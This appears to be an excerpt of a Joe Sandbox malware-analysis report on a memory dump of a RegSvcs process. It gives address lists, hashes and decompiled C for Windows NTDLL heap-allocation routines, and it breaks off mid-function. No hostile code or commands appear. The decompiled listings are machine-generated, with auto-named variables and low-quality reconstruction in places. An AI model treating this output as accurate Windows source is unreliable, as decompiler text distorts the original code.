0x0108e95c
0x0108e9cb
0x0108e9d2
0x0108e9d4
0x0108e9f2
0x0108e9f6
0x0108ea10
0x0108ea18
0x0108ea1a
0x0108ea1f
0x0108ea2c
0x0108ea2d
0x0108ea2e
0x0108ea32
0x0108ea3d
0x0108ea42
0x0108ea45
0x0108ea51
0x0108ea60
0x0108ea65
0x0108ea68
0x0108ea6a
0x0108ea6a
0x0108ea6a
0x0108ea6f
0x0108ea76
0x0108ea7c
0x0108ea7e
0x0108ea81
0x0108ea85
0x0108ea88
0x0108ea8c
0x0108ea8f
0x0108ea93
0x0108ea98
0x00000000
0x00000000
0x0108ea9a
0x0108ea9d
0x0108eaa2
0x0108eb0e
0x0108eb15
0x0108eb17
0x0108eb33
0x0108eb36
0x0108eb39
0x0108eb3f
0x0108eb45
0x0108eb4a
0x0108eb52
0x0108ecb1
0x0108ecb9
0x0108ecbe
0x0108ecc3
0x0108ecc6
0x0108eceb
0x0108ecee
0x0108ecf9
0x0108ecfe
0x0108ed00
0x0108ed05
0x0108ed07
0x0108ed0a
0x0108ed0c
0x0108ed0e
0x0108ed12
0x0108ed19
0x0108ed1e
0x0108ed24
0x0108ed2a
0x0108ed2a
0x0108ed2c
0x0108ed3e
0x0108ed3e
0x0108eb5a
0x0108eb62
0x0108eb69
0x00000000
0x00000000
0x0108eb6f
0x0108eb75
0x0108eb79
0x0108eb79
0x0108eb88
0x0108eb8e
0x0108eb90
0x0108eb92
0x0108eb97
0x0108ed3f
0x0108ed45
0x00000000
0x00000000
0x0108ed4b
0x0108ed4e
0x00000000
0x0108eb9d
0x0108eb9d
0x0108eb9d
0x0108eba2
0x0108ebb5
0x0108ebbc
0x0108ebbe
0x0108ebbe
0x0108ebc3
0x0108ebc5
0x0108ebcb
0x0108ebd2
0x0108ebd5
0x0108ebdb
0x0108ebdf
0x0108ebe1
0x0108ebf0
0x0108ebf9
0x0108ec04
0x0108ec07
0x0108ec0a
0x0108ec82
0x0108ec85
0x0108ec8b
0x0108ec91
0x0108ec93
0x0108ec96
0x0108ec9b
0x0108eca6
0x0108ecac
0x0108ecae
0x0108ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x0108ec0c
0x0108ec0c
0x0108ec0c
0x0108ec0f
0x0108ec12
0x0108ec15
0x0108ec15
0x0108ec18
0x0108ec1e
0x00000000
0x00000000
0x0108ec22
0x0108ec28
0x0108ec4b
0x0108ec5b
0x0108ec5d
0x0108ec63
0x0108ec65
0x0108ec68
0x0108ec6b
0x0108ec6b
0x0108ec70
0x0108ec71
0x0108ec74
0x0108ec7d
0x00000000
0x0108ebe3
0x0108ebe3
0x0108ebe6
0x0108ebe6
0x0108ebe7
0x0108ebe9
0x0108ebec
0x00000000
0x0108ebe6
0x0108ebe1
0x0108eba4
0x0108eba9
0x0108ebb0
0x0108ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x0108ebab
0x0108ebab
0x0108ebab
0x0108ebac
0x0108ebac
0x00000000
0x0108ebab
0x0108eb97
0x0108eb19
0x0108eb1c
0x0108eb21
0x0108eb26
0x0108eb2c
0x0108eb2c
0x00000000
0x0108eb26
0x0108ead6
0x0108ead9
0x0108eadc
0x0108eadc
0x0108eadc
0x0108eade
0x0108eae4
0x00000000
0x00000000
0x0108eaee
0x0108eaf7
0x0108eaf9
0x00000000
0x00000000
0x0108eb04
0x0108eb12
0x00000000
0x0108eb12
0x0108eb06
0x00000000
0x0108eb06
0x0108eaf0
0x0108eaf2
0x0108eaf4
0x00000000
0x0108eaf4
0x0108ea6a
0x0108ea21
0x00000000
0x0108ea21
0x0108e9d6
0x0108e9d6
0x0108e9e0
0x0108e9e2
0x0108e9e2
0x0108e9e8
0x00000000
0x0108e9e8
0x0108e987
0x0108e98f
0x0108e992
0x0108e995
0x0108e995
0x0108e998
0x0108e998
0x0108e99a
0x0108e9a0
0x00000000
0x00000000
0x0108e9a9
0x0108e9b2
0x0108e9b4
0x00000000
0x00000000
0x0108e9ba
0x0108e9c1
0x0108e9cf
0x00000000
0x0108e9cf
0x0108e9c3
0x00000000
0x0108e9c3
0x0108e9ab
0x0108e9ad
0x0108e9af
0x00000000
0x0108e9af
0x0108e924
0x0108e8b7
0x0108e8ba
0x0108e902
0x0108e908
0x0108e90a
0x00000000
0x0108e90a
0x0108e8bc
0x0108e8bf
0x0108e8f9
0x0108e8ff
0x0108e901
0x00000000
0x0108e901
0x0108e8c1
0x0108e8c4
0x0108e8f0
0x0108e8f6
0x0108e8f8
0x00000000
0x0108e8f8
0x0108e8c6
0x0108e8c9
0x0108e8e7
0x0108e8ed
0x0108e8ef
0x00000000
0x0108e8ef
0x0108e8cb
0x0108e8ce
0x0108e8de
0x0108e8e4
0x0108e8e6
0x00000000
0x0108e8e6
0x0108e8d3
0x00000000
0x0108e8d5
0x0108e8db
0x0108e8dd
0x00000000
0x0108e8dd
0x0108e853
0x0108e855
0x0108e85b
0x0108e85d
0x0108e897
0x0108e89c
0x0108e8a2
0x0108e8a6
0x0108e8ab
0x0108e8ad
0x0108e8ad
0x00000000
0x0108e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 0108EA10
RtlDebugPrintTimes.NTDLL ref: 0108ED24

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4f00a4937f1ddd40b4f8b7330e4b5effb7fe225ad4592e5ca3ca7df18ec30cf0
Instruction ID: 72a9de825a75984313ccbfe9f8025204f5c7f3aca5cf59ae5a926440ab6b4168
Opcode Fuzzy Hash: 4f00a4937f1ddd40b4f8b7330e4b5effb7fe225ad4592e5ca3ca7df18ec30cf0
Instruction Fuzzy Hash: 0602C272E006169BCB58DFADC89167EFBF6AF88200B59816DD4D6DB381D634E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FB40E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00FB40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00FBB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00FBB150(", passed to %s", _t29);
					}
					_push("\n");
					E00FBB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x10a6378 = 1;
						asm("int3");
						 *0x10a6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00fb40e6
0x00fb40e8
0x00fb40f1
0x0101042d
0x0101044c
0x01010451
0x0101042f
0x01010444
0x01010449
0x0101045d
0x01010466
0x0101046e
0x01010474
0x01010475
0x0101047a
0x0101048a
0x0101048c
0x01010493
0x01010494
0x01010494
0x00000000
0x0101049b
0x00000000

Strings

Invalid heap signature for heap at %p, xrefs: 01010458
HEAP: , xrefs: 0101044C
RtlAllocateHeap, xrefs: 01010468
HEAP[%wZ]: , xrefs: 0101043F
, passed to %s, xrefs: 01010469

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: da7f1f2b9afe743a3cb9db15ae3d5b4961e1989bfff3829970c03c32141118c6
Instruction ID: a27d04e5460b9150d896753e33e131dcc826cbeb21fecf6b3b529366bd6e9d35
Opcode Fuzzy Hash: da7f1f2b9afe743a3cb9db15ae3d5b4961e1989bfff3829970c03c32141118c6
Instruction Fuzzy Hash: 62014C321486409FE2299B6DE85EF9277F8DB40B30F188069F04487696CFEDD480E615

Uniqueness

Uniqueness Score: -1.00%

Function 00FD5600 Relevance: 6.2, Strings: 3, Instructions: 2418
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00FD5600(signed char __ecx, signed int __edx, signed int _a4, unsigned int _a8, intOrPtr* _a12, signed char* _a16) {
				signed char _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v53;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char _v69;
				char _v70;
				signed char _v71;
				char _v72;
				char _v73;
				signed int _v80;
				signed int _v88;
				signed short _v92;
				signed char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v109;
				char _v110;
				signed int _v111;
				char _v112;
				signed char _v116;
				signed int _v120;
				signed char _v128;
				signed short _v132;
				signed short _v134;
				signed short _v136;
				signed short _v138;
				signed int _v144;
				signed char _v148;
				signed char _v152;
				signed short _v156;
				signed int _v160;
				signed short _v164;
				signed short _v166;
				signed int _v172;
				signed char _v176;
				signed char _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed char _v200;
				char _v204;
				signed int _v206;
				signed char _v212;
				intOrPtr _v216;
				signed int _v220;
				unsigned int* _v224;
				intOrPtr _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed char _v248;
				unsigned int* _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed char _v276;
				signed char _v280;
				intOrPtr _v284;
				signed int* _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed short _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr _v340;
				signed char _v344;
				signed char _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				unsigned int _v372;
				unsigned int _v380;
				unsigned int _v388;
				unsigned int _v396;
				unsigned int _v404;
				unsigned int _v412;
				unsigned int _v420;
				unsigned int _v428;
				unsigned int _v436;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t1068;
				signed char _t1072;
				signed int _t1073;
				intOrPtr _t1075;
				signed int _t1078;
				char* _t1079;
				signed int _t1097;
				signed char* _t1100;
				intOrPtr _t1101;
				signed int _t1102;
				signed char* _t1105;
				intOrPtr _t1106;
				signed int _t1107;
				signed char* _t1110;
				signed char* _t1112;
				signed int _t1120;
				void* _t1127;
				signed char* _t1137;
				intOrPtr* _t1145;
				signed int _t1147;
				intOrPtr _t1148;
				void* _t1149;
				signed int _t1151;
				signed char _t1153;
				signed int _t1158;
				signed int _t1159;
				signed char _t1179;
				signed char _t1180;
				unsigned int _t1182;
				signed char _t1192;
				signed char _t1193;
				char _t1205;
				signed char _t1209;
				signed short _t1211;
				void* _t1212;
				signed int _t1217;
				signed int _t1218;
				signed char _t1219;
				signed int _t1221;
				intOrPtr* _t1227;
				intOrPtr* _t1228;
				signed int _t1235;
				signed int _t1236;
				intOrPtr* _t1244;
				intOrPtr* _t1246;
				signed int _t1249;
				signed int _t1253;
				signed int _t1255;
				intOrPtr _t1261;
				signed int _t1267;
				signed int _t1269;
				intOrPtr* _t1281;
				intOrPtr* _t1282;
				signed int _t1285;
				signed int* _t1289;
				signed int* _t1291;
				intOrPtr _t1294;
				signed int _t1295;
				signed int _t1301;
				signed int* _t1302;
				signed int _t1303;
				intOrPtr _t1308;
				signed short _t1309;
				intOrPtr _t1315;
				signed int _t1316;
				intOrPtr _t1318;
				signed int* _t1319;
				signed int _t1320;
				signed int* _t1323;
				signed int _t1324;
				unsigned int* _t1333;
				signed int _t1336;
				signed int _t1338;
				signed int _t1341;
				signed int _t1347;
				signed int* _t1348;
				signed int _t1349;
				signed short _t1352;
				signed short _t1358;
				signed short _t1364;
				signed int _t1373;
				intOrPtr _t1379;
				intOrPtr _t1384;
				intOrPtr* _t1392;
				signed int _t1393;
				signed int _t1396;
				signed int _t1397;
				intOrPtr _t1399;
				signed int _t1401;
				signed char _t1403;
				signed int _t1405;
				signed int _t1406;
				intOrPtr _t1408;
				signed int* _t1410;
				signed int _t1411;
				signed short _t1414;
				signed int* _t1424;
				signed int _t1425;
				signed int* _t1428;
				signed int _t1429;
				signed int _t1432;
				signed int _t1434;
				signed int _t1438;
				signed short _t1440;
				signed short _t1447;
				signed short _t1453;
				intOrPtr* _t1459;
				signed char _t1460;
				void* _t1461;
				signed int _t1465;
				signed int _t1466;
				intOrPtr _t1469;
				signed int _t1471;
				signed char _t1473;
				signed int _t1475;
				signed int _t1476;
				signed char _t1477;
				intOrPtr _t1479;
				signed int* _t1481;
				signed int _t1482;
				signed short _t1485;
				signed int _t1496;
				signed int _t1504;
				signed int _t1506;
				signed int _t1518;
				unsigned int _t1521;
				intOrPtr _t1522;
				signed int _t1523;
				signed int _t1524;
				signed int _t1525;
				signed char _t1526;
				signed short _t1527;
				signed int _t1529;
				unsigned int _t1535;
				signed int _t1538;
				signed short _t1539;
				signed int _t1559;
				signed int _t1564;
				signed char _t1565;
				signed char _t1566;
				signed char _t1567;
				signed char _t1569;
				signed int _t1571;
				signed char _t1576;
				signed short* _t1577;
				signed char _t1579;
				intOrPtr* _t1581;
				signed int _t1583;
				intOrPtr* _t1586;
				intOrPtr _t1590;
				signed int _t1594;
				signed char _t1599;
				intOrPtr* _t1601;
				signed int _t1604;
				signed int _t1605;
				signed int _t1606;
				signed int _t1608;
				signed char _t1614;
				signed short _t1617;
				signed int _t1619;
				signed short _t1620;
				signed int _t1622;
				unsigned int _t1628;
				signed short _t1632;
				signed int _t1634;
				signed char _t1638;
				signed char _t1643;
				signed char _t1648;
				intOrPtr _t1651;
				signed int _t1654;
				signed int _t1656;
				signed int _t1657;
				signed char _t1658;
				signed char _t1660;
				signed char _t1668;
				signed short _t1671;
				intOrPtr _t1673;
				signed short _t1674;
				intOrPtr _t1676;
				signed int _t1678;
				signed int _t1681;
				signed int _t1682;
				signed int _t1686;
				signed short _t1689;
				signed int _t1691;
				signed char _t1695;
				signed char _t1700;
				signed char _t1705;
				signed int _t1707;
				intOrPtr _t1708;
				signed int _t1709;
				signed int _t1710;
				signed char _t1712;
				signed char _t1719;
				signed int* _t1723;
				signed int _t1724;
				signed int _t1725;
				unsigned int _t1728;
				signed int _t1729;
				signed int _t1730;
				signed char* _t1734;
				signed int _t1736;
				intOrPtr* _t1738;
				signed int _t1740;
				signed int _t1743;
				unsigned int _t1744;
				intOrPtr _t1753;
				signed char _t1754;
				signed short* _t1755;
				signed short* _t1757;
				unsigned int _t1760;
				intOrPtr _t1763;
				signed int _t1765;
				signed short _t1766;
				signed short _t1768;
				void* _t1769;
				signed int _t1771;
				signed int _t1773;
				signed int _t1775;
				unsigned int _t1781;
				signed int _t1784;
				signed int _t1785;
				signed int _t1787;
				signed int _t1789;
				unsigned int _t1791;
				unsigned int _t1795;
				unsigned int _t1799;
				signed int _t1802;
				intOrPtr* _t1803;
				signed short* _t1805;
				signed int _t1807;
				intOrPtr _t1809;
				signed short _t1811;
				signed short _t1813;
				intOrPtr _t1814;
				signed char _t1820;
				void* _t1821;
				signed int _t1825;
				signed char _t1829;
				unsigned int _t1831;
				unsigned int* _t1836;
				unsigned int _t1838;
				unsigned int _t1842;
				unsigned int _t1846;
				signed int _t1852;
				signed int _t1858;
				unsigned int _t1861;
				signed int _t1866;
				intOrPtr _t1868;
				signed char _t1871;
				void* _t1873;
				signed int _t1876;
				signed int _t1877;
				signed int _t1880;
				signed char _t1881;
				signed int _t1882;
				signed int _t1883;
				signed short _t1885;
				signed short* _t1886;
				signed char _t1887;
				signed char _t1888;
				signed int* _t1889;
				intOrPtr _t1890;
				signed int _t1892;
				intOrPtr* _t1893;
				signed int _t1894;
				signed int _t1895;
				signed int _t1896;
				signed int _t1897;
				signed int _t1900;
				signed int _t1904;
				signed int _t1905;
				signed int _t1906;
				intOrPtr _t1907;
				signed int _t1908;
				signed int _t1910;
				signed int _t1911;
				signed int _t1912;
				unsigned int _t1916;
				signed int _t1917;
				void* _t1921;
				intOrPtr _t1922;
				intOrPtr _t1923;
				signed int _t1924;
				signed int _t1926;
				signed int _t1927;
				signed int _t1928;
				unsigned int _t1931;
				signed int _t1932;
				signed int* _t1933;
				intOrPtr _t1934;
				signed int _t1935;
				void* _t1936;
				void* _t1937;
				void* _t1940;
				void* _t1941;
				signed int _t1946;
				void* _t1952;

				_t1725 = __edx;
				_t1540 = __ecx;
				_push(0xfffffffe);
				_push(0x108fc88);
				_push(0x10017f0);
				_push( *[fs:0x0]);
				_t1937 = _t1936 - 0x1a0;
				_push(_t1873);
				_t1068 =  *0x10ad360;
				_v12 = _v12 ^ _t1068;
				_push(_t1068 ^ _t1935);
				 *[fs:0x0] =  &_v20;
				_v96 = __edx;
				_t1871 = __ecx;
				_v280 = __ecx;
				_v196 = 0;
				_v104 = 1;
				_v53 = 0;
				_v80 = 0;
				_v60 = 0;
				_v180 = 0;
				_t1518 = _a8 >> 3;
				if((__edx & 0x7d010f60) != 0 || _a4 >= 0x80000000) {
					_v104 = 0;
					 *_a16 = 4;
					_t1072 = _a4;
					__eflags = _t1072 - 0x7fffffff;
					if(_t1072 > 0x7fffffff) {
						_t1073 = 0;
						goto L157;
					}
					__eflags = _t1725 & 0x61000000;
					if((_t1725 & 0x61000000) != 0) {
						__eflags = _t1725 & 0x10000000;
						if(__eflags != 0) {
							goto L287;
						}
						_t1073 = E01072D82(_t1518, _t1540, _t1725, _t1871, _t1873, __eflags, _t1072);
						goto L157;
					}
					L287:
					__eflags = _t1072;
					if(_t1072 == 0) {
						_t1072 = 1;
					}
					_t1728 =  *((intOrPtr*)(_t1871 + 0x94)) + _t1072 &  *(_t1871 + 0x98);
					__eflags = _t1728 - 0x10;
					if(_t1728 < 0x10) {
						_t1728 = 0x10;
					}
					_a8 = _t1728;
					_t1074 = _v96;
					_t1546 = _t1074 >> 0x00000004 & 0xffffffe1 | 0x00000001;
					_v64 = _t1546;
					__eflags = _t1074 & 0x3c000100;
					if((_t1074 & 0x3c000100) == 0) {
						__eflags =  *(_t1871 + 0xbc);
						if( *(_t1871 + 0xbc) == 0) {
							goto L291;
						}
						goto L290;
					} else {
						L290:
						_t1546 = _t1546 | 0x00000002;
						_v64 = _t1546;
						_t1728 = _t1728 + 8;
						__eflags = _t1728;
						_a8 = _t1728;
						L291:
						_t1729 = _t1728 >> 3;
						_v52 = _t1729;
						goto L4;
					}
				} else {
					_t1546 = 1;
					_v64 = 1;
					_t1729 = _t1518;
					_v52 = _t1729;
					if(_t1729 < 2) {
						_a8 = _a8 + 8;
						_t1729 = 2;
						_v52 = 2;
					}
					 *_a16 = 3;
					_t1074 = _v96;
					L4:
					_t1876 = _t1074 & 0x00800000;
					if(_t1876 != 0) {
						_t1075 =  *[fs:0x30];
						__eflags =  *(_t1075 + 0x68) & 0x00000800;
						_t1074 = _v96;
						if(( *(_t1075 + 0x68) & 0x00000800) == 0) {
							_t1546 = _t1546 | 0x00000008;
							_v64 = _t1546;
						}
					}
					_v8 = 0;
					_t1946 = _t1074 & 0x00000001;
					if(_t1946 != 0) {
						L11:
						if(_t1729 >  *((intOrPtr*)(_t1871 + 0x5c))) {
							__eflags =  *(_t1871 + 0x40) & 0x00000002;
							if(( *(_t1871 + 0x40) & 0x00000002) == 0) {
								_v148 = 0xc0000023;
								L363:
								_v80 = 0;
								goto L153;
							}
							_t1521 = _a8 + 0x18;
							_a8 = _t1521;
							_a8 = _t1521;
							_t1880 = (E00FE1164(_t1546) & 0x0000000f) << 0xc;
							_v352 = _t1880;
							_v200 = 0;
							_v204 = _a8 + 0x1000 + _t1880;
							_t1732 = 1;
							_t1546 = _t1871;
							_t1518 = E00FE0678(_t1871, 1);
							_v356 = _t1518;
							_push(_t1518);
							_push(0x2000);
							_push( &_v204);
							_push(0);
							_push( &_v200);
							_push(0xffffffff);
							_t1074 = E00FF9660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								goto L153;
							}
							_v60 = _v200 + _t1880;
							_push(_t1518);
							_push(0x1000);
							_push( &_a8);
							_push(0);
							_push( &_v60);
							_push(0xffffffff);
							_t1074 = E00FF9660();
							_v148 = _t1074;
							__eflags = _t1074;
							if(_t1074 < 0) {
								_v60 = 0;
								 *((intOrPtr*)(_t1871 + 0x214)) =  *((intOrPtr*)(_t1871 + 0x214)) + 1;
								goto L363;
							}
							 *((short*)(_v60 + 0x18)) = _a8 - _a4;
							 *(_v60 + 0x1a) = _v64 | 0x00000002;
							 *(_v60 + 0x10) = _a8;
							 *((intOrPtr*)(_v60 + 0x14)) = _v204;
							 *((char*)(_v60 + 0x1f)) = 4;
							 *((intOrPtr*)(_t1871 + 0x1f0)) =  *((intOrPtr*)(_t1871 + 0x1f0)) + _a8;
							_t1097 = E00FD7D50();
							__eflags = _t1097;
							if(_t1097 != 0) {
								_t1100 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1100 = 0x7ffe0380;
							}
							__eflags =  *_t1100;
							if( *_t1100 != 0) {
								_t1101 =  *[fs:0x30];
								__eflags =  *(_t1101 + 0x240) & 0x00000001;
								if(( *(_t1101 + 0x240) & 0x00000001) != 0) {
									_t1732 = _v60;
									E0107138A(_t1518, _t1871, _v60, _a8, 9);
								}
							}
							_t1102 = E00FD7D50();
							__eflags = _t1102;
							if(_t1102 != 0) {
								_t1105 =  *( *[fs:0x30] + 0x50) + 0x226;
							} else {
								_t1105 = 0x7ffe0380;
							}
							__eflags =  *_t1105;
							if( *_t1105 != 0) {
								_t1106 =  *[fs:0x30];
								__eflags =  *(_t1106 + 0x240) & 0x00000001;
								if(( *(_t1106 + 0x240) & 0x00000001) != 0) {
									__eflags = E00FD7D50();
									if(__eflags == 0) {
										_t1137 = 0x7ffe0380;
									} else {
										_t1137 =  *( *[fs:0x30] + 0x50) + 0x226;
									}
									_t1732 = _v60;
									E01071582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1137 & 0x000000ff);
								}
							}
							_t1107 = E00FD7D50();
							__eflags = _t1107;
							if(_t1107 != 0) {
								_t1110 =  *( *[fs:0x30] + 0x50) + 0x230;
							} else {
								_t1110 = 0x7ffe038a;
							}
							__eflags =  *_t1110;
							if( *_t1110 != 0) {
								__eflags = E00FD7D50();
								if(__eflags == 0) {
									_t1112 = 0x7ffe038a;
								} else {
									_t1112 =  *( *[fs:0x30] + 0x50) + 0x230;
								}
								_t1732 = _v60;
								E01071582(_t1518, _t1871, _v60, __eflags, _a8,  *(_t1871 + 0x74) << 3,  *_t1112 & 0x000000ff);
							}
							__eflags =  *(_t1871 + 0x40) & 0x08000000;
							if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
								_t1559 = E00FE16C7(1, _t1732) & 0x0000ffff;
								_v206 = _t1559;
								 *(_v60 + 8) = _t1559;
							}
							_t1120 =  *( *[fs:0x30] + 0x68);
							_v360 = _t1120;
							__eflags = _t1120 & 0x00000800;
							if((_t1120 & 0x00000800) != 0) {
								 *((short*)(_v60 + 0xa)) = E0105E9F0(_t1871, _v96 >> 0x00000012 & 0x000000ff, 0,  *(_v60 + 0x10) >> 3, 1);
							}
							_t1546 = _v60;
							__eflags =  *(_t1871 + 0x4c);
							if( *(_t1871 + 0x4c) != 0) {
								 *(_t1546 + 0x1b) =  *(_t1546 + 0x1a) ^  *(_t1546 + 0x19) ^  *(_t1546 + 0x18);
								_t737 = _t1546 + 0x18;
								 *_t737 =  *(_t1546 + 0x18) ^  *(_t1871 + 0x50);
								__eflags =  *_t737;
								_t1546 = _v60;
							}
							_t1127 = _t1871 + 0x9c;
							_t1734 =  *(_t1127 + 4);
							_t1881 =  *_t1734;
							__eflags = _t1881 - _t1127;
							if(_t1881 != _t1127) {
								_push(_t1546);
								_t1546 = 0xd;
								E0107A80D(0, _t1127, 0, _t1881);
							} else {
								 *_t1546 = _t1127;
								 *(_t1546 + 4) = _t1734;
								 *_t1734 = _t1546;
								 *(_t1127 + 4) = _t1546;
							}
							_t1074 = _v60 + 0x20;
							_v80 = _v60 + 0x20;
							goto L153;
						}
						if(_t1876 != 0) {
							L21:
							_t1145 = _a12;
							if(_t1145 == 0) {
								L23:
								_v228 = _t1871 + 0xc0;
								_t1564 =  *(_t1871 + 0xb4);
								_v36 = _t1564;
								while(1) {
									_t1522 =  *((intOrPtr*)(_t1564 + 4));
									if(_t1729 < _t1522) {
										_t1523 = _t1729;
										goto L26;
									}
									_t1147 =  *_t1564;
									__eflags = _t1147;
									if(_t1147 == 0) {
										_t1523 = _t1522 - 1;
										while(1) {
											L26:
											_v144 = _t1523;
											_t1524 = _t1523 -  *(_t1564 + 0x14);
											_t1882 = 0;
											_t1736 =  *(_t1564 + 0x18);
											_v40 = _t1736;
											_t1148 =  *((intOrPtr*)(_t1736 + 4));
											if(_t1736 == _t1148) {
												goto L311;
											}
											_t1424 = _t1148 + 0xfffffff8;
											_v32 = _t1424;
											_t1425 =  *_t1424;
											_v380 = _t1425;
											_t1671 = _t1425 & 0x0000ffff;
											if( *(_t1871 + 0x4c) != 0) {
												_t1846 =  *(_t1871 + 0x50) ^ _t1425;
												_v380 = _t1846;
												_t1453 = _t1846 & 0x0000ffff;
												_v44 = _t1453;
												_v68 = _t1453 & 0x0000ffff;
												_t1705 = _t1846 >> 0x00000010 ^ _t1846 >> 0x00000008 ^ _t1846;
												if(_t1846 >> 0x18 != _t1705) {
													_push(_t1705);
													E0107A80D(_t1871, _v32, 0, 0);
													_t1671 = _v44 & 0x0000ffff;
												} else {
													_t1671 = _v68;
												}
												_t1736 = _v40;
											}
											_t1673 = _v52 - (_t1671 & 0x0000ffff);
											_v300 = _t1673;
											if(_t1673 > 0) {
												_t1882 = _t1736;
												goto L48;
											} else {
												_t1428 =  *_t1736 + 0xfffffff8;
												_v32 = _t1428;
												_t1429 =  *_t1428;
												_v388 = _t1429;
												_t1674 = _t1429 & 0x0000ffff;
												if( *(_t1871 + 0x4c) != _t1882) {
													_t1842 =  *(_t1871 + 0x50) ^ _t1429;
													_v388 = _t1842;
													_t1447 = _t1842 & 0x0000ffff;
													_v44 = _t1447;
													_v68 = _t1447 & 0x0000ffff;
													_t1700 = _t1842 >> 0x00000010 ^ _t1842 >> 0x00000008 ^ _t1842;
													if(_t1842 >> 0x18 != _t1700) {
														_push(_t1700);
														E0107A80D(_t1871, _v32, 0, 0);
														_t1674 = _v44 & 0x0000ffff;
													} else {
														_t1674 = _v68;
													}
													_t1736 = _v40;
												}
												_t1676 = _v52 - (_t1674 & 0x0000ffff);
												_v304 = _t1676;
												_t1564 = _v36;
												if(_t1676 <= 0) {
													_t1882 =  *_t1736;
													goto L49;
												} else {
													if( *_t1564 != _t1882 || _v144 !=  *((intOrPtr*)(_t1564 + 4)) - 1) {
														_t1432 = _t1524 >> 5;
														_t1921 = ( *((intOrPtr*)(_t1564 + 4)) -  *(_t1564 + 0x14) >> 5) - 1;
														_t1836 =  *((intOrPtr*)(_t1564 + 0x1c)) + _t1432 * 4;
														_v32 = _t1524 & 0x0000001f;
														_t1535 =  !((1 << _v32) - 1) &  *_t1836;
														while(1) {
															_v224 = _t1836;
															_v184 = _t1432;
															if(_t1535 != 0) {
																break;
															}
															if(_t1432 > _t1921) {
																__eflags = _t1535;
																if(_t1535 != 0) {
																	break;
																}
																_t1564 = _v36;
																goto L167;
															} else {
																_t1836 =  &(_t1836[1]);
																_t1535 =  *_t1836;
																_t1432 = _t1432 + 1;
																continue;
															}
														}
														__eflags = _t1535;
														if(_t1535 != 0) {
															_t1678 = _t1535 & 0x000000ff;
															__eflags = _t1535;
															if(_t1535 == 0) {
																_t1681 = ( *((_t1535 >> 0x00000008 & 0x000000ff) + 0xf984d0) & 0x000000ff) + 8;
															} else {
																_t1681 =  *(_t1678 + 0xf984d0) & 0x000000ff;
															}
														} else {
															_t1686 = _t1535 >> 0x00000010 & 0x000000ff;
															__eflags = _t1686;
															if(_t1686 != 0) {
																_t1681 = ( *(_t1686 + 0xf984d0) & 0x000000ff) + 0x10;
															} else {
																_t97 = (_t1535 >> 0x18) + 0xf984d0; // 0x10008
																_t1681 = ( *_t97 & 0x000000ff) + 0x18;
																__eflags = _t1681;
															}
														}
														_t1434 = (_t1432 << 5) + _t1681;
														_v184 = _t1434;
														_t1682 = _v36;
														__eflags =  *(_t1682 + 8);
														if( *(_t1682 + 8) != 0) {
															_t1434 = _t1434 + _t1434;
														}
														_t1882 =  *( *((intOrPtr*)(_t1682 + 0x20)) + _t1434 * 4);
														goto L48;
													} else {
														__eflags =  *((intOrPtr*)(_t1564 + 8)) - _t1882;
														if( *((intOrPtr*)(_t1564 + 8)) != _t1882) {
															_t1524 = _t1524 + _t1524;
														}
														_t1538 =  *( *((intOrPtr*)(_t1564 + 0x20)) + _t1524 * 4);
														while(1) {
															__eflags = _t1736 - _t1538;
															if(_t1736 == _t1538) {
																break;
															}
															_t1438 =  *(_t1538 - 8);
